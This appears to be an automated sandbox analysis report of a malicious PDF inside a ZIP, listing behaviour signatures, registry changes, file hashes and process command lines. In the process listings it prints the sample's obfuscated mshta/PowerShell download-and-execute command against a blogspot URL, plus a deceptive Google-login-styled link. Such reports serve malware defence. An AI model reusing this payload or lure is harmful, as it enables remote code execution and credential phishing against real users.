Analysis Overview
SHA256
c445c0bae9b5f72b7673419c5a0c8928350d00ab9d09fcd10f6caa6150b95e9c
Threat Level: Shows suspicious behavior
The file a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.zip was found to be: Shows suspicious behavior.
Malicious Activity Summary
PDF contains JavaScript
Enumerates physical storage devices
One or more HTTP URLs in PDF identified
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-07 15:19
Signatures
PDF contains JavaScript
One or more HTTP URLs in PDF identified
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-07 15:19
Reported
2024-02-07 15:22
Platform
win7-20231215-en
Max time kernel
117s
Max time network
142s
Command Line
Signatures
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{64E259A1-C5CC-11EE-88F9-76B33C18F4CF} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "413481084" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.pdf"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" "javascript:_r°0=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm htlfeb24.blogspot.com//////////////////////////////atom.xml | iex);Start-Sleep -Seconds 5;','run']; x°x=[_r°0[3],_r°0[0],_r°0[1],_r°0[2]]; new ActiveXObject(x°x[2])[x°x[0]](x°x[3], 0, true);close();new ActiveXObject(x°x[1]).DeleteFile(WScript.ScriptFullName);"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com+signin%3Dsecure+v2+identifier%[email protected]////////atom.xml?http://www.booking.com
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm htlfeb24.blogspot.com//////////////////////////////atom.xml | iex);Start-Sleep -Seconds 5;
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2704 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.bing.com | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
memory/2832-2-0x000000006DE40000-0x000000006E3EB000-memory.dmp
memory/2832-3-0x000000006DE40000-0x000000006E3EB000-memory.dmp
memory/2832-4-0x0000000000250000-0x0000000000290000-memory.dmp
memory/2832-5-0x0000000000250000-0x0000000000290000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabE1CA.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\TarE4CA.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
memory/2832-83-0x000000006DE40000-0x000000006E3EB000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6f1b37e9aa88930e15b4aee3afc03f79 |
| SHA1 | be3636743e4773e342c40c2be24277b4604ce2bf |
| SHA256 | af0d5f920aeed99be40e6d1aba6a7f7264a4a98c6f2b80d66e564453cb71185c |
| SHA512 | 4fa556f9b362947675e2dd51d59d821abbafaefbc1127fd71a3a24cea24b557ac077b00b14fc892b1303c95dc922de1edd4b48077cfc21e7f771bf744455831f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 252f5497cfeac5bbcbc4a10c17941e37 |
| SHA1 | 083e43af5860bd07ab549f8bc4421cd113b82d71 |
| SHA256 | aa72b5e6d65a505be7330b3e4ac21858dc141551f374271574b4134f58c7b09a |
| SHA512 | dcf5a00a30a23e36be639cfbd878ec0f5e53f6601ba780e7c31b68f5f3f222a1dd21d59b288a7844c4c71614cf2bb86bfd304f60e75042cd29476d9b38495aa4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c27afeb0bbae829db72ac30e5ba8d55c |
| SHA1 | 21fc03619fb367c23afd19872a25309941184035 |
| SHA256 | f7df667bad612c7ef970208e686a86939da936df336b48722d68829ffba57596 |
| SHA512 | a8ae8f1ba1140052be6817f9378d21a44cc8590e7e7172bf0da7a2d2186d47fa5c863887acad98a7e745a4c54bf60428bf299b96fd143f1f0b514ad1e0d17083 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1552a5ea0085d32ce9b633caff6ea458 |
| SHA1 | eea575081698284bb1b2967a513bfa6ce343f63b |
| SHA256 | 91ac8d23997476df5fcc982f8336e3a275ea92aaa75faa40a9732b8e8a24749c |
| SHA512 | e1089712ca43a223e8fca7b0509c09271b2f276b24d565247dfec73f05645638002b83c03b637df63e820340cb7e92da988b8261cd66c632a3dd5838c0a03abe |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ba583ef38f6baf36e9b695be5271da1e |
| SHA1 | 79539f9a46efcf3237ad1edbbdb823056910fca9 |
| SHA256 | 04629e02177e94c6d94c4f81d65731259a5610cace5d89868e528f061172849b |
| SHA512 | e4e7e77a90e34efdcebe082b12f88689fb6fd50a9365f7b873fd48924f3d73c84967f26ef15799356c7c11f112ad05ff161de805afc65bff2d18d3f1922ae61a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 32841ca4fa1bc43b9bfdea0e0a809734 |
| SHA1 | 4fd0479154ecf315bbb3c4760e520336509578b0 |
| SHA256 | 323eb37ef5f6141f77f8a68ea3d4aa41c51cff7650c1f16b9ce2323d852fc8a9 |
| SHA512 | c6b74f093612d10e02bf88823dd03551d8fcdb180abfebbcdd22f780fe95cd6d632dacdf9a7c5012f5dbc022c0bc4b49560bb9aaaa685bf99ba362b13a483515 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6f41fa6bf50428e27e18a4b73859d553 |
| SHA1 | 5213ce7c502d6c68e058ddb820987eaa0a4ac265 |
| SHA256 | 4e56456bbd1fa9389bab026236e25db2e10c59e095cd49097ac5c6cdb3d5bbb9 |
| SHA512 | ae3875aa89d1a7cd8cb91fb7b1207b6b063e8b0f7316701c684503a34ccadf8f4feb19938f4cc00505e6b03909a920b3f2949c57ea174e867d572fef6ff83d88 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6fa1e81b3de224840b5143ceeded9e90 |
| SHA1 | 1c0afb63b62b8c7d3440770c90524411bc2b79e7 |
| SHA256 | 03e3221be5e5b912823cb5e3cd94912f4dc710ce3fe538625b7e9eb4e494c863 |
| SHA512 | fe34c907c7596103221381880de550c624204421862abc0f53685295c10bfe017f80cc0c650f49eb83ff4b0377a94a8fdd12eec94628c0ce7fba2d7ab077233b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8f71a8d423c2947fc044cf4b4ed43f98 |
| SHA1 | eab2aab527b44e7cf2034ebda17b6fd848e6ab6b |
| SHA256 | 30ad6f585136519107bc9cccdc9d323cb103c13060d2c3534f2e0464c11aa4f5 |
| SHA512 | a74cec782b47373c42c6470b3e7b57914f66fd34e7b42b6d8d4d6dae888c7e2946a094368e51cd73e2a684e1d68c2834480604e4f8a54cfe3476c607560877b0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 19039e901207bdae8e1376cfe09f645d |
| SHA1 | 3b7d6496d545018b5582c6d9254cd2f2cbb69d50 |
| SHA256 | b86036abc1cc1050b9f00e714af1f3815fdc4d4c135e084be17755ed6544d1f9 |
| SHA512 | dc0d2303de593de3e0e8c232279f9aa475c7d39a6bac1fcc698e9dd92a768ff17d63d19fdadb3d1df6ad68f7bde48078dbb576344dcdc125a9fa8823317de872 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b501d6c97d61eab195fe4b7f1dcc09f8 |
| SHA1 | c4399036054545b1383e57558579fc219eb637a3 |
| SHA256 | 7f2aa8af38f5d3b02599cec5abee04e75934013e97ba933093102377a94c216b |
| SHA512 | efa02893195637ea85581a658f21d9211bf29f737901c7cdfddf3a26f77b6b6341f6bca75184ebed3e2daad2273f94e78e412879f28d3715dccf385e1bb7da28 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5c9b1499a0a2f81923e70d1ff1b8e50c |
| SHA1 | d2073a348bced4cf5b0a05c88ea56a57745ddabb |
| SHA256 | 0f5199d2a81ab952c75b1bb118cf60eeea68af00e21cc5bd89aa9ee0ad4088a4 |
| SHA512 | 996a2efae7572ce5952b3ad8d0bf6a4af21843efaa6c92a1e74dba9aeaf0bbd8e15be3c32b6fcff86de7fe7257bfcc642e9ab0106fd3db75fb2ae1f79f520a02 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0724b11ea4746fc28a6364d09304c3fb |
| SHA1 | 117eea326a6a37ae10064591e804e629b6be8fc5 |
| SHA256 | 6d10b002d09babd7bdc3281fe31367fe9f89a92078d54e3afa1105c57d332029 |
| SHA512 | 2424fcf978afcfa1eab5f57a858bdd432b9492d1a76311d6080249f90b409cbcbceed0b0dc49ab0dbb6bcc1ec43b10453f9df0904451184b73155c1fd53fd7c8 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e7a3f93d49007c771a34eaccac1c9a63 |
| SHA1 | 82d4dd111e89a90a38ed0d4afef2968b5c3a07f6 |
| SHA256 | b873d365ab2528156e4f8232a46b9adde78d108951276b868445176f5747def1 |
| SHA512 | f3d469f829caed995832de71b76b8a398ab369f98a4351cf1058c65b9696308ce9112f6c377913f52533dff3c7659ef808fb4c252056b9239d060fe1e7f90271 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fc0b98705430d61eb6d26c306eeadcb9 |
| SHA1 | c2102f9d1606733a198b2718ae31890d1dbf6977 |
| SHA256 | dbc35cfbe4f6b68ea8544a363a86c4e22f0aad37d6f281df572378bb28ec65b6 |
| SHA512 | 6ebc4fd3564236326ae2b28e2df414e178e232751022e9d4a84afd51c5a69fc53ea97bbdfc59c8ec1105884b6a6987a0ea3bd814e06dd6bc6162be601726a9b2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | cc43d3ba9e35a0839c116f013b4b726e |
| SHA1 | e0ad3f113f18c426cb9662b5b0a6c60e186a69d7 |
| SHA256 | c63609a38c78b4d1e94f462f9b1ca72d0b704655dc2850280d098eac1505c5a7 |
| SHA512 | 8c9d2e0349cb64e59b19400e55b547fb1feb12f327b2a4b01395f916080b2d912e41d88357c03ec0baf6f4337d0c22d8784e044483be2be2cc46368cbefb27c8 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-07 15:19
Reported
2024-02-07 15:22
Platform
win10v2004-20231215-en
Max time kernel
146s
Max time network
154s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.pdf"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com+signin%3Dsecure+v2+identifier%[email protected]////////atom.xml?http://www.booking.com
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x78,0x108,0x7ffaf50546f8,0x7ffaf5054708,0x7ffaf5054718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
